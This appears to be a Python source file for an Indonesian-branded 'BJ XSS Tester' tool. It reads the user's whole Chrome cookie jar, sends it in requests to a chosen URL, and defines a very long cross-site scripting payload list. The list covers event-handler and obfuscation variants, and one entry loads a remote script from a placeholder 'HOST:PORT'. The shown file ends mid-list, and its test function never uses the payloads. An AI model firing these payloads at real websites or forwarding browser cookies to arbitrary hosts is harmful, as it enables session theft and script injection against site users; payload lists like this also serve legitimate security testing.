import requests
import browsercookie
from colorama import init, Fore
import pyfiglet

# Inisialisasi colorama untuk Windows
init(autoreset=True)

def display_welcome():
    # Mencetak nama program dan pembuat menggunakan ASCII art
    ascii_art = pyfiglet.figlet_format("BJ XSS Tester")
    print(Fore.CYAN + ascii_art)
    
    # Informasi tambahan tentang program
    info = (
    
        "-------------------------------------------------------------------------------\n"
        "  BJ XSS Tester - Web Security Tool\n"
        "  Copyright (C) 2025 BlankJacke Cyber Security\n"
        "-------------------------------------------------------------------------------\n"
        "  📌 Fungsi:\n"
        "  ✅ Menguji celah XSS pada website target\n"
        "  ✅ Mendeteksi potensi eksploitasi dalam input form\n"
        "  ✅ Memberikan hasil dengan tingkat kerentanan\n\n"
        "  ⚠️ Disclaimer:\n"
        "  Gunakan tool ini hanya untuk tujuan etis dan pengujian keamanan yang sah!\n"
    )
    
    print(Fore.CYAN + info)

def get_tokopedia_cookie():
    # Menggunakan library browsercookie untuk mendapatkan cookie dari browser
    cj = browsercookie.chrome()
    return cj

def test_xss(url, cookie):
    # Menggunakan cookie untuk membuat request ke URL yang ingin diuji
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36'
    }

    try:
        response = requests.get(url, cookies=cookie, headers=headers)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Request failed: {e}"

def generate_xss_payloads():
    # Fungsi untuk menghasilkan payload XSS
    payloads = [
        "<script>alert('XSS')</script>",
        "<img src='x' onerror='alert(1)'>",
        "<svg/onload=alert(1)>",
        "javascript:alert('XSS')",
        "<iframe src='javascript:alert(1)'></iframe>",
        "<body onload='alert(1)'>",
        "<a href='javascript:alert(1)'>click me</a>",
        "<link rel='stylesheet' href='x' onload='alert(1)'>",
        "<input value='\";alert(1);\"'>",
        "<x </onxxx=1",
"<http://onxxx%3D1/",
"<x onxxx=alert(1) 1='",
"<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>",
"onload=alert(1)><svg/1='",
">alert(1)</script><script/1='",
"*/alert(1)</script><script>/*",
"*/</script>'>alert(1)/*<script/1='",
"<script>alert(1)</script>",
"<script src=javascript:alert(1)>",
"<iframe src=javascript:alert(1)>",
"<embed src=javascript:alert(1)>",
"<a href=javascript:alert(1)>click",
"<math><brute href=javascript:alert(1)>click",
"<form action=javascript:alert(1)><input type=submit>",
"<isindex action=javascript:alert(1) type=submit value=click>",
"<form><button formaction=javascript:alert(1)>click",
"<form><input formaction=javascript:alert(1) type=submit value=click>",
"<form><input formaction=javascript:alert(1) type=image value=click>",
"<form><input formaction=javascript:alert(1) type=image src=SOURCE>",
"<isindex formaction=javascript:alert(1) type=submit value=click>",
"<object data=javascript:alert(1)>",
"<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>",
"<svg><script xlink:href=data:,alert(1) />",
"<math><brute xlink:href=javascript:alert(1)>click",
"<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>",
"<html ontouchstart=alert(1)>",
"<html ontouchend=alert(1)>",
"<html ontouchmove=alert(1)>",
"<html ontouchcancel=alert(1)>",
"<body onorientationchange=alert(1)>",
"<body onload=alert(1)>",
"<body onpageshow=alert(1)>",
"<body onfocus=alert(1)>",
"<body onhashchange=alert(1)><a href=#x>click this!#x",
"<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x",
"<body onscroll=alert(1)><br><br><br><br>",
"<br><br><br><br><br><br><br><br><br><br>",
"<br><br><br><br><br><br><br><br><br><br>",
"<br><br><br><br><br><br><x id=x>#x",
"<body onresize=alert(1)>press F12!",
"<body onhelp=alert(1)>press F1! (MSIE)",
"<marquee onstart=alert(1)>",
"<marquee loop=1 width=0 onfinish=alert(1)>",
"<audio src onloadstart=alert(1)>",
"<video onloadstart=alert(1)><source>",
"<input autofocus onblur=alert(1)>",
"<keygen autofocus onfocus=alert(1)>",
"<form onsubmit=alert(1)><input type=submit>",
"<select onchange=alert(1)><option>1<option>2",
"<menu id=x contextmenu=x onshow=alert(1)>right click me!",
"alert`1`",
"alert&lpar;1&rpar;",
"alert&#x28;1&#x29",
"alert&#40;1&#41",
"(alert)(1)",
"a=alert,a(1)",
"[1].find(alert)",
"top[/al/.source+/ert/.source](1)",
"al\u0065rt(1)",
"top['al\145rt'](1)",
"top['al\x65rt'](1)",
"top[8680439..toString(30)](1)",
"navigator.vibrate(500)",
"eval(URL.slice(-8))>#alert(1)",
"eval(location.hash.slice(1)>#alert(1)",
"<a id=x tabindex=1 onactivate=alert(1)></a>",
"<a id=x tabindex=1 onbeforeactivate=alert(1)></a>",
"<a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus>",
"<a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus>",
"<a id=x tabindex=1 onfocus=alert(1)></a>",
"<a id=x tabindex=1 onfocusin=alert(1)></a>",
"<acronym id=x tabindex=1 onactivate=alert(1)></acronym>",
"<acronym id=x tabindex=1 onbeforeactivate=alert(1)></acronym>",
"<acronym id=x tabindex=1 onbeforedeactivate=alert(1)></acronym><input autofocus>",
"<acronym id=x tabindex=1 ondeactivate=alert(1)></acronym><input id=y autofocus>",
"<acronym id=x tabindex=1 onfocus=alert(1)></acronym>",
"<acronym id=x tabindex=1 onfocusin=alert(1)></acronym>",
"<address id=x tabindex=1 onactivate=alert(1)></address>",
"<address id=x tabindex=1 onbeforeactivate=alert(1)></address>",
"<address id=x tabindex=1 onbeforedeactivate=alert(1)></address><input autofocus>",
"<address id=x tabindex=1 ondeactivate=alert(1)></address><input id=y autofocus>",
"<address id=x tabindex=1 onfocus=alert(1)></address>",
"<address id=x tabindex=1 onfocusin=alert(1)></address>",
"<address onblur=alert(1) tabindex=1 id=x></address><input autofocus>",
"<applet id=x tabindex=1 onactivate=alert(1)></applet>",
"<applet id=x tabindex=1 onbeforeactivate=alert(1)></applet>",
"<applet id=x tabindex=1 onbeforedeactivate=alert(1)></applet><input autofocus>",
"<applet id=x tabindex=1 ondeactivate=alert(1)></applet><input id=y autofocus>",
"<applet id=x tabindex=1 onfocus=alert(1)></applet>",
"<applet id=x tabindex=1 onfocusin=alert(1)></applet>",
"<area id=x tabindex=1 onactivate=alert(1)></area>",
"<area id=x tabindex=1 onbeforeactivate=alert(1)></area>",
"<area id=x tabindex=1 onbeforedeactivate=alert(1)></area><input autofocus>",
"<area id=x tabindex=1 ondeactivate=alert(1)></area><input id=y autofocus>",
"<article id=x tabindex=1 onactivate=alert(1)></article>",
"<article id=x tabindex=1 onbeforeactivate=alert(1)></article>",
"<article id=x tabindex=1 onbeforedeactivate=alert(1)></article><input autofocus>",
"<article id=x tabindex=1 ondeactivate=alert(1)></article><input id=y autofocus>",
"<article id=x tabindex=1 onfocus=alert(1)></article>",
"<article id=x tabindex=1 onfocusin=alert(1)></article>",
"<aside id=x tabindex=1 onactivate=alert(1)></aside>",
"<aside id=x tabindex=1 onbeforeactivate=alert(1)></aside>",
"<aside id=x tabindex=1 onbeforedeactivate=alert(1)></aside><input autofocus>",
"<aside id=x tabindex=1 ondeactivate=alert(1)></aside><input id=y autofocus>",
"<aside id=x tabindex=1 onfocus=alert(1)></aside>",
"<aside id=x tabindex=1 onfocusin=alert(1)></aside>",
"<audio id=x tabindex=1 onactivate=alert(1)></audio>",
"<audio id=x tabindex=1 onbeforeactivate=alert(1)></audio>",
"<audio id=x tabindex=1 onbeforedeactivate=alert(1)></audio><input autofocus>",
"<audio id=x tabindex=1 ondeactivate=alert(1)></audio><input id=y autofocus>",
"<audio onblur=alert(1) tabindex=1 id=x></audio><input autofocus>",
"<audio src/onerror=alert(1)>",
"<b id=x tabindex=1 onactivate=alert(1)></b>",
"<b id=x tabindex=1 onbeforeactivate=alert(1)></b>",
"<b id=x tabindex=1 onbeforedeactivate=alert(1)></b><input autofocus>",
"<b id=x tabindex=1 ondeactivate=alert(1)></b><input id=y autofocus>",
"<b id=x tabindex=1 onfocus=alert(1)></b>",
"<b id=x tabindex=1 onfocusin=alert(1)></b>",
"<b onblur=alert(1) tabindex=1 id=x></b><input autofocus>",
"<base id=x tabindex=1 onactivate=alert(1)></base>",
"<base id=x tabindex=1 onbeforeactivate=alert(1)></base>",
"<base id=x tabindex=1 onbeforedeactivate=alert(1)></base><input autofocus>",
"<base id=x tabindex=1 ondeactivate=alert(1)></base><input id=y autofocus>",
"<base id=x tabindex=1 onfocus=alert(1)></base>",
"<base id=x tabindex=1 onfocusin=alert(1)></base>",
"<basefont id=x tabindex=1 onactivate=alert(1)></basefont>",
"<basefont id=x tabindex=1 onbeforeactivate=alert(1)></basefont>",
"<basefont id=x tabindex=1 onbeforedeactivate=alert(1)></basefont><input autofocus>",
"<basefont id=x tabindex=1 ondeactivate=alert(1)></basefont><input id=y autofocus>",
"<basefont id=x tabindex=1 onfocus=alert(1)></basefont>",
"<basefont id=x tabindex=1 onfocusin=alert(1)></basefont>",
"<basefont onblur=alert(1) tabindex=1 id=x></basefont><input autofocus>",
"<bdi id=x tabindex=1 onactivate=alert(1)></bdi>",
"<bdi id=x tabindex=1 onbeforeactivate=alert(1)></bdi>",
"<bdi id=x tabindex=1 onbeforedeactivate=alert(1)></bdi><input autofocus>",
"<bdi id=x tabindex=1 ondeactivate=alert(1)></bdi><input id=y autofocus>",
"<bdi id=x tabindex=1 onfocus=alert(1)></bdi>",
"<bdi id=x tabindex=1 onfocusin=alert(1)></bdi>",
"<bdo id=x tabindex=1 onactivate=alert(1)></bdo>",
"<bdo id=x tabindex=1 onbeforeactivate=alert(1)></bdo>",
"<bdo id=x tabindex=1 onbeforedeactivate=alert(1)></bdo><input autofocus>",
"<bdo id=x tabindex=1 ondeactivate=alert(1)></bdo><input id=y autofocus>",
"<bdo id=x tabindex=1 onfocus=alert(1)></bdo>",
"<bdo id=x tabindex=1 onfocusin=alert(1)></bdo>",
"<bdo onblur=alert(1) tabindex=1 id=x></bdo><input autofocus>",
"<bgsound id=x tabindex=1 onactivate=alert(1)></bgsound>",
"<bgsound id=x tabindex=1 onbeforeactivate=alert(1)></bgsound>",
"<bgsound id=x tabindex=1 onbeforedeactivate=alert(1)></bgsound><input autofocus>",
"<bgsound id=x tabindex=1 ondeactivate=alert(1)></bgsound><input id=y autofocus>",
"<bgsound id=x tabindex=1 onfocus=alert(1)></bgsound>",
"<bgsound id=x tabindex=1 onfocusin=alert(1)></bgsound>",
"<big id=x tabindex=1 onactivate=alert(1)></big>",
"<big id=x tabindex=1 onbeforeactivate=alert(1)></big>",
"<big id=x tabindex=1 onbeforedeactivate=alert(1)></big><input autofocus>",
"<big id=x tabindex=1 ondeactivate=alert(1)></big><input id=y autofocus>",
"<big id=x tabindex=1 onfocus=alert(1)></big>",
"<big id=x tabindex=1 onfocusin=alert(1)></big>",
"<blink id=x tabindex=1 onactivate=alert(1)></blink>",
"<blink id=x tabindex=1 onbeforeactivate=alert(1)></blink>",
"<blink id=x tabindex=1 onbeforedeactivate=alert(1)></blink><input autofocus>",
"<blink id=x tabindex=1 ondeactivate=alert(1)></blink><input id=y autofocus>",
"<blink id=x tabindex=1 onfocus=alert(1)></blink>",
"<blink id=x tabindex=1 onfocusin=alert(1)></blink>",
"<blink onblur=alert(1) tabindex=1 id=x></blink><input autofocus>",
"<blink onfocusout=alert(1) tabindex=1 id=x></blink><input autofocus>",
"<blockquote id=x tabindex=1 onactivate=alert(1)></blockquote>",
"<blockquote id=x tabindex=1 onbeforeactivate=alert(1)></blockquote>",
"<blockquote id=x tabindex=1 onbeforedeactivate=alert(1)></blockquote><input autofocus>",
"<blockquote id=x tabindex=1 ondeactivate=alert(1)></blockquote><input id=y autofocus>",
"<blockquote id=x tabindex=1 onfocus=alert(1)></blockquote>",
"<blockquote id=x tabindex=1 onfocusin=alert(1)></blockquote>",
"<blockquote onblur=alert(1) tabindex=1 id=x></blockquote><input autofocus>",
"<body id=x tabindex=1 onactivate=alert(1)></body>",
"<body id=x tabindex=1 onbeforeactivate=alert(1)></body>",
"<body id=x tabindex=1 onbeforedeactivate=alert(1)></body><input autofocus>",
"<body id=x tabindex=1 ondeactivate=alert(1)></body><input id=y autofocus>",
"<body id=x tabindex=1 onfocus=alert(1)></body>",
"<body id=x tabindex=1 onfocusin=alert(1)></body>",
"<body onafterprint=alert(1)>",
"<body onbeforeprint=alert(1)>",
"<body onblur=alert(1) id=x><iframe id=x>",
"<body onerror=alert(1) onload=/>",
"<body onfocusout=alert(1) id=x><iframe id=x>",
"<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>",
"<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>",
"<body onwheel=alert(1)>",
"<br id=x tabindex=1 onactivate=alert(1)></br>",
"<br id=x tabindex=1 onbeforeactivate=alert(1)></br>",
"<br id=x tabindex=1 onbeforedeactivate=alert(1)></br><input autofocus>",
"<br id=x tabindex=1 ondeactivate=alert(1)></br><input id=y autofocus>",
"<br id=x tabindex=1 onfocus=alert(1)></br>",
"<br id=x tabindex=1 onfocusin=alert(1)></br>",
"<button id=x tabindex=1 onactivate=alert(1)></button>",
"<button id=x tabindex=1 onbeforeactivate=alert(1)></button>",
"<button id=x tabindex=1 onbeforedeactivate=alert(1)></button><input autofocus>",
"<button id=x tabindex=1 ondeactivate=alert(1)></button><input id=y autofocus>",
"<canvas id=x tabindex=1 onactivate=alert(1)></canvas>",
"<canvas id=x tabindex=1 onbeforeactivate=alert(1)></canvas>",
"<canvas id=x tabindex=1 onbeforedeactivate=alert(1)></canvas><input autofocus>",
"<canvas id=x tabindex=1 ondeactivate=alert(1)></canvas><input id=y autofocus>",
"<canvas id=x tabindex=1 onfocus=alert(1)></canvas>",
"<canvas id=x tabindex=1 onfocusin=alert(1)></canvas>",
"<caption id=x tabindex=1 onactivate=alert(1)></caption>",
"<caption id=x tabindex=1 onbeforeactivate=alert(1)></caption>",
"<caption id=x tabindex=1 onbeforedeactivate=alert(1)></caption><input autofocus>",
"<caption id=x tabindex=1 ondeactivate=alert(1)></caption><input id=y autofocus>",
"<caption id=x tabindex=1 onfocus=alert(1)></caption>",
"<caption id=x tabindex=1 onfocusin=alert(1)></caption>",

"<center id=x tabindex=1 onactivate=alert(1)></center>",
"<center id=x tabindex=1 onbeforeactivate=alert(1)></center>",
"<center id=x tabindex=1 onbeforedeactivate=alert(1)></center><input autofocus>",
"<center id=x tabindex=1 ondeactivate=alert(1)></center><input id=y autofocus>",
"<center id=x tabindex=1 onfocus=alert(1)></center>",
"<center id=x tabindex=1 onfocusin=alert(1)></center>",
"<cite id=x tabindex=1 onactivate=alert(1)></cite>",
"<cite id=x tabindex=1 onbeforeactivate=alert(1)></cite>",
"<cite id=x tabindex=1 onbeforedeactivate=alert(1)></cite><input autofocus>",
"<cite id=x tabindex=1 ondeactivate=alert(1)></cite><input id=y autofocus>",
"<cite id=x tabindex=1 onfocus=alert(1)></cite>",
"<cite id=x tabindex=1 onfocusin=alert(1)></cite>",
"<code id=x tabindex=1 onactivate=alert(1)></code>",
"<code id=x tabindex=1 onbeforeactivate=alert(1)></code>",
"<code id=x tabindex=1 onbeforedeactivate=alert(1)></code><input autofocus>",
"<code id=x tabindex=1 ondeactivate=alert(1)></code><input id=y autofocus>",
"<code id=x tabindex=1 onfocus=alert(1)></code>",
"<code id=x tabindex=1 onfocusin=alert(1)></code>",
"<col id=x tabindex=1 onactivate=alert(1)></col>",
"<col id=x tabindex=1 onbeforeactivate=alert(1)></col>",
"<col id=x tabindex=1 onbeforedeactivate=alert(1)></col><input autofocus>",
"<col id=x tabindex=1 ondeactivate=alert(1)></col><input id=y autofocus>",
"<col id=x tabindex=1 onfocus=alert(1)></col>",
"<col id=x tabindex=1 onfocusin=alert(1)></col>",
"<colgroup id=x tabindex=1 onactivate=alert(1)></colgroup>",
"<colgroup id=x tabindex=1 onbeforeactivate=alert(1)></colgroup>",
"<colgroup id=x tabindex=1 onbeforedeactivate=alert(1)></colgroup><input autofocus>",
"<colgroup id=x tabindex=1 ondeactivate=alert(1)></colgroup><input id=y autofocus>",
"<colgroup id=x tabindex=1 onfocus=alert(1)></colgroup>",
"<colgroup id=x tabindex=1 onfocusin=alert(1)></colgroup>",
"<command id=x tabindex=1 onactivate=alert(1)></command>",
"<command id=x tabindex=1 onbeforeactivate=alert(1)></command>",
"<command id=x tabindex=1 onbeforedeactivate=alert(1)></command><input autofocus>",
"<command id=x tabindex=1 ondeactivate=alert(1)></command><input id=y autofocus>",
"<command id=x tabindex=1 onfocus=alert(1)></command>",
"<command id=x tabindex=1 onfocusin=alert(1)></command>",
"<content id=x tabindex=1 onactivate=alert(1)></content>",
"<content id=x tabindex=1 onbeforeactivate=alert(1)></content>",
"<content id=x tabindex=1 onbeforedeactivate=alert(1)></content><input autofocus>",
"<content id=x tabindex=1 ondeactivate=alert(1)></content><input id=y autofocus>",
"<content id=x tabindex=1 onfocus=alert(1)></content>",
"<content id=x tabindex=1 onfocusin=alert(1)></content>",
"<data id=x tabindex=1 onactivate=alert(1)></data>",
"<data id=x tabindex=1 onbeforeactivate=alert(1)></data>",
"<data id=x tabindex=1 onbeforedeactivate=alert(1)></data><input autofocus>",
"<data id=x tabindex=1 ondeactivate=alert(1)></data><input id=y autofocus>",
"<data id=x tabindex=1 onfocus=alert(1)></data>",
"<data id=x tabindex=1 onfocusin=alert(1)></data>",
"<datalist id=x tabindex=1 onactivate=alert(1)></datalist>",
"<datalist id=x tabindex=1 onbeforeactivate=alert(1)></datalist>",
"<datalist id=x tabindex=1 onbeforedeactivate=alert(1)></datalist><input autofocus>",
"<datalist id=x tabindex=1 ondeactivate=alert(1)></datalist><input id=y autofocus>",
"<datalist id=x tabindex=1 onfocus=alert(1)></datalist>",
"<datalist id=x tabindex=1 onfocusin=alert(1)></datalist>",
"<dd id=x tabindex=1 onactivate=alert(1)></dd>",
"<dd id=x tabindex=1 onbeforeactivate=alert(1)></dd>",
"<dd id=x tabindex=1 onbeforedeactivate=alert(1)></dd><input autofocus>",
"<dd id=x tabindex=1 ondeactivate=alert(1)></dd><input id=y autofocus>",
"<dd id=x tabindex=1 onfocus=alert(1)></dd>",
"<dd id=x tabindex=1 onfocusin=alert(1)></dd>",
"<del id=x tabindex=1 onactivate=alert(1)></del>",
"<del id=x tabindex=1 onbeforeactivate=alert(1)></del>",
"<del id=x tabindex=1 onbeforedeactivate=alert(1)></del><input autofocus>",
"<del id=x tabindex=1 ondeactivate=alert(1)></del><input id=y autofocus>",
"<del id=x tabindex=1 onfocus=alert(1)></del>",
"<del id=x tabindex=1 onfocusin=alert(1)></del>",
"<details id=x tabindex=1 onactivate=alert(1)></details>",
"<details id=x tabindex=1 onbeforeactivate=alert(1)></details>",
"<details id=x tabindex=1 onbeforedeactivate=alert(1)></details><input autofocus>",
"<details id=x tabindex=1 ondeactivate=alert(1)></details><input id=y autofocus>",
"<details id=x tabindex=1 onfocus=alert(1)></details>",
"<details id=x tabindex=1 onfocusin=alert(1)></details>",
"<dfn id=x tabindex=1 onactivate=alert(1)></dfn>",
"<dfn id=x tabindex=1 onbeforeactivate=alert(1)></dfn>",
"<dfn id=x tabindex=1 onbeforedeactivate=alert(1)></dfn><input autofocus>",
"<dfn id=x tabindex=1 ondeactivate=alert(1)></dfn><input id=y autofocus>",
"<dfn id=x tabindex=1 onfocus=alert(1)></dfn>",
"<dfn id=x tabindex=1 onfocusin=alert(1)></dfn>",
"<dialog id=x tabindex=1 onactivate=alert(1)></dialog>",
"<dialog id=x tabindex=1 onbeforeactivate=alert(1)></dialog>",
"<dialog id=x tabindex=1 onbeforedeactivate=alert(1)></dialog><input autofocus>",
"<dialog id=x tabindex=1 ondeactivate=alert(1)></dialog><input id=y autofocus>",
"<dialog id=x tabindex=1 onfocus=alert(1)></dialog>",
"<dialog id=x tabindex=1 onfocusin=alert(1)></dialog>",
"<dir id=x tabindex=1 onactivate=alert(1)></dir>",
"<dir id=x tabindex=1 onbeforeactivate=alert(1)></dir>",
"<dir id=x tabindex=1 onbeforedeactivate=alert(1)></dir><input autofocus>",
"<dir id=x tabindex=1 ondeactivate=alert(1)></dir><input id=y autofocus>",
"<dir id=x tabindex=1 onfocus=alert(1)></dir>",
"<dir id=x tabindex=1 onfocusin=alert(1)></dir>",
"<div id=x tabindex=1 onactivate=alert(1)></div>",
"<div id=x tabindex=1 onbeforeactivate=alert(1)></div>",
"<div id=x tabindex=1 onbeforedeactivate=alert(1)></div><input autofocus>",
"<div id=x tabindex=1 ondeactivate=alert(1)></div><input id=y autofocus>",
"<div id=x tabindex=1 onfocus=alert(1)></div>",
"<div id=x tabindex=1 onfocusin=alert(1)></div>",
"<dl id=x tabindex=1 onactivate=alert(1)></dl>",
"<dl id=x tabindex=1 onbeforeactivate=alert(1)></dl>",
"<dl id=x tabindex=1 onbeforedeactivate=alert(1)></dl><input autofocus>",
"<dl id=x tabindex=1 ondeactivate=alert(1)></dl><input id=y autofocus>",
"<dl id=x tabindex=1 onfocus=alert(1)></dl>",
"<dl id=x tabindex=1 onfocusin=alert(1)></dl>",
"<dt id=x tabindex=1 onactivate=alert(1)></dt>",
"<dt id=x tabindex=1 onbeforeactivate=alert(1)></dt>",
"<dt id=x tabindex=1 onbeforedeactivate=alert(1)></dt><input autofocus>",
"<dt id=x tabindex=1 ondeactivate=alert(1)></dt><input id=y autofocus>",
"<dt id=x tabindex=1 onfocus=alert(1)></dt>",
"<dt id=x tabindex=1 onfocusin=alert(1)></dt>",
"<dt onblur=alert(1) tabindex=1 id=x></dt><input autofocus>",
"<element id=x tabindex=1 onactivate=alert(1)></element>",
"<element id=x tabindex=1 onbeforeactivate=alert(1)></element>",
"<element id=x tabindex=1 onbeforedeactivate=alert(1)></element><input autofocus>",
"<element id=x tabindex=1 ondeactivate=alert(1)></element><input id=y autofocus>",
"<element id=x tabindex=1 onfocus=alert(1)></element>",
"<element id=x tabindex=1 onfocusin=alert(1)></element>",
"<em id=x tabindex=1 onactivate=alert(1)></em>",
"<em id=x tabindex=1 onbeforeactivate=alert(1)></em>",
"<em id=x tabindex=1 onbeforedeactivate=alert(1)></em><input autofocus>",
"<em id=x tabindex=1 ondeactivate=alert(1)></em><input id=y autofocus>",
"<em id=x tabindex=1 onfocus=alert(1)></em>",
"<em id=x tabindex=1 onfocusin=alert(1)></em>",
"<embed id=x onfocus=alert(1) type=text/html>",
"<embed id=x onfocusin=alert(1) type=text/html>",
"<embed id=x tabindex=1 onactivate=alert(1)></embed>",
"<embed id=x tabindex=1 onbeforeactivate=alert(1)></embed>",
"<embed id=x tabindex=1 onbeforedeactivate=alert(1)></embed><input autofocus>",
"<embed id=x tabindex=1 ondeactivate=alert(1)></embed><input id=y autofocus>",
"<fieldset id=x tabindex=1 onactivate=alert(1)></fieldset>",
"<fieldset id=x tabindex=1 onbeforeactivate=alert(1)></fieldset>",
"<fieldset id=x tabindex=1 onbeforedeactivate=alert(1)></fieldset><input autofocus>",
"<fieldset id=x tabindex=1 ondeactivate=alert(1)></fieldset><input id=y autofocus>",
"<fieldset id=x tabindex=1 onfocus=alert(1)></fieldset>",
"<fieldset id=x tabindex=1 onfocusin=alert(1)></fieldset>",
"<figcaption id=x tabindex=1 onactivate=alert(1)></figcaption>",
"<figcaption id=x tabindex=1 onbeforeactivate=alert(1)></figcaption>",
"<figcaption id=x tabindex=1 onbeforedeactivate=alert(1)></figcaption><input autofocus>",
"<figcaption id=x tabindex=1 ondeactivate=alert(1)></figcaption><input id=y autofocus>",
"<figcaption id=x tabindex=1 onfocus=alert(1)></figcaption>",
"<figcaption id=x tabindex=1 onfocusin=alert(1)></figcaption>",
"<figure id=x tabindex=1 onactivate=alert(1)></figure>",
"<figure id=x tabindex=1 onbeforeactivate=alert(1)></figure>",
"<figure id=x tabindex=1 onbeforedeactivate=alert(1)></figure><input autofocus>",
"<figure id=x tabindex=1 ondeactivate=alert(1)></figure><input id=y autofocus>",
"<figure id=x tabindex=1 onfocus=alert(1)></figure>",
"<figure id=x tabindex=1 onfocusin=alert(1)></figure>",
"<font id=x tabindex=1 onactivate=alert(1)></font>",
"<font id=x tabindex=1 onbeforeactivate=alert(1)></font>",
"<font id=x tabindex=1 onbeforedeactivate=alert(1)></font><input autofocus>",
"<font id=x tabindex=1 ondeactivate=alert(1)></font><input id=y autofocus>",
"<font id=x tabindex=1 onfocus=alert(1)></font>",
"<font id=x tabindex=1 onfocusin=alert(1)></font>",
"<footer id=x tabindex=1 onactivate=alert(1)></footer>",
"<footer id=x tabindex=1 onbeforeactivate=alert(1)></footer>",
"<footer id=x tabindex=1 onbeforedeactivate=alert(1)></footer><input autofocus>",
"<footer id=x tabindex=1 ondeactivate=alert(1)></footer><input id=y autofocus>",
"<footer id=x tabindex=1 onfocus=alert(1)></footer>",
"<footer id=x tabindex=1 onfocusin=alert(1)></footer>",
"<form id=x tabindex=1 onactivate=alert(1)></form>",
"<form id=x tabindex=1 onbeforeactivate=alert(1)></form>",
"<form id=x tabindex=1 onbeforedeactivate=alert(1)></form><input autofocus>",
"<form id=x tabindex=1 ondeactivate=alert(1)></form><input id=y autofocus>",
"<form id=x tabindex=1 onfocus=alert(1)></form>",
"<form id=x tabindex=1 onfocusin=alert(1)></form>",
"<form onreset=alert(1)><input type=reset>",
"<form onsubmit=alert(1)><input type=submit>",
"<form><input oninvalid=alert(1) required><input type=submit>",
"<form><textarea oninvalid=alert(1) required><input type=submit>",
"<frame id=x tabindex=1 onactivate=alert(1)></frame>",
"<frame id=x tabindex=1 onbeforeactivate=alert(1)></frame>",
"<frame id=x tabindex=1 onbeforedeactivate=alert(1)></frame><input autofocus>",
"<frame id=x tabindex=1 ondeactivate=alert(1)></frame><input id=y autofocus>",
"<frameset id=x tabindex=1 onactivate=alert(1)></frameset>",
"<frameset id=x tabindex=1 onbeforeactivate=alert(1)></frameset>",
"<frameset id=x tabindex=1 onbeforedeactivate=alert(1)></frameset><input autofocus>",
"<frameset id=x tabindex=1 ondeactivate=alert(1)></frameset><input id=y autofocus>",
"<frameset id=x tabindex=1 onfocus=alert(1)></frameset>",
"<frameset id=x tabindex=1 onfocusin=alert(1)></frameset>",
"<frameset><frame id=x onfocus=alert(1)>",
"<frameset><frame id=x onfocusin=alert(1)>",
"<frameset><frame onload=alert(1)>",
"<h1 id=x tabindex=1 onactivate=alert(1)></h1>",
"<h1 id=x tabindex=1 onbeforeactivate=alert(1)></h1>",
"<h1 id=x tabindex=1 onbeforedeactivate=alert(1)></h1><input autofocus>",
"<h1 id=x tabindex=1 ondeactivate=alert(1)></h1><input id=y autofocus>",
"<h1 id=x tabindex=1 onfocus=alert(1)></h1>",
"<h1 id=x tabindex=1 onfocusin=alert(1)></h1>",
"<head id=x tabindex=1 onactivate=alert(1)></head>",
"<head id=x tabindex=1 onbeforeactivate=alert(1)></head>",
"<head id=x tabindex=1 onbeforedeactivate=alert(1)></head><input autofocus>",
"<head id=x tabindex=1 ondeactivate=alert(1)></head><input id=y autofocus>",
"<head id=x tabindex=1 onfocus=alert(1)></head>",
"<head id=x tabindex=1 onfocusin=alert(1)></head>",
"<header id=x tabindex=1 onactivate=alert(1)></header>",
"<header id=x tabindex=1 onbeforeactivate=alert(1)></header>",
"<header id=x tabindex=1 onbeforedeactivate=alert(1)></header><input autofocus>",
"<header id=x tabindex=1 ondeactivate=alert(1)></header><input id=y autofocus>",
"<header id=x tabindex=1 onfocus=alert(1)></header>",
"<header id=x tabindex=1 onfocusin=alert(1)></header>",
"<hgroup id=x tabindex=1 onactivate=alert(1)></hgroup>",
"<hgroup id=x tabindex=1 onbeforeactivate=alert(1)></hgroup>",
"<hgroup id=x tabindex=1 onbeforedeactivate=alert(1)></hgroup><input autofocus>",
"<hgroup id=x tabindex=1 ondeactivate=alert(1)></hgroup><input id=y autofocus>",
"<hgroup id=x tabindex=1 onfocus=alert(1)></hgroup>",
"<hgroup id=x tabindex=1 onfocusin=alert(1)></hgroup>",
"<hr id=x tabindex=1 onactivate=alert(1)></hr>",
"<hr id=x tabindex=1 onbeforeactivate=alert(1)></hr>",
"<hr id=x tabindex=1 onbeforedeactivate=alert(1)></hr><input autofocus>",
"<hr id=x tabindex=1 ondeactivate=alert(1)></hr><input id=y autofocus>",
"<hr id=x tabindex=1 onfocus=alert(1)></hr>",
"<hr id=x tabindex=1 onfocusin=alert(1)></hr>",
"<html id=x tabindex=1 onactivate=alert(1)></html>",
"<html id=x tabindex=1 onbeforeactivate=alert(1)></html>",
"<html id=x tabindex=1 onbeforedeactivate=alert(1)></html><input autofocus>",
"<html id=x tabindex=1 ondeactivate=alert(1)></html><input id=y autofocus>",
"<html id=x tabindex=1 onfocus=alert(1)></html>",
"<html id=x tabindex=1 onfocusin=alert(1)></html>",
"<i id=x tabindex=1 onactivate=alert(1)></i>",
"<i id=x tabindex=1 onbeforeactivate=alert(1)></i>",
"<i id=x tabindex=1 onbeforedeactivate=alert(1)></i><input autofocus>",
"<i id=x tabindex=1 ondeactivate=alert(1)></i><input id=y autofocus>",
"<i id=x tabindex=1 onfocus=alert(1)></i>",
"<i id=x tabindex=1 onfocusin=alert(1)></i>",
"<iframe id=x onfocusin=alert(1)>",
"<iframe id=x tabindex=1 onactivate=alert(1)></iframe>",
"<iframe id=x tabindex=1 onbeforeactivate=alert(1)></iframe>",
"<iframe id=x tabindex=1 onbeforedeactivate=alert(1)></iframe><input autofocus>",
"<iframe id=x tabindex=1 ondeactivate=alert(1)></iframe><input id=y autofocus>",
"<img id=x tabindex=1 onactivate=alert(1)></img>",
"<img id=x tabindex=1 onbeforeactivate=alert(1)></img>",
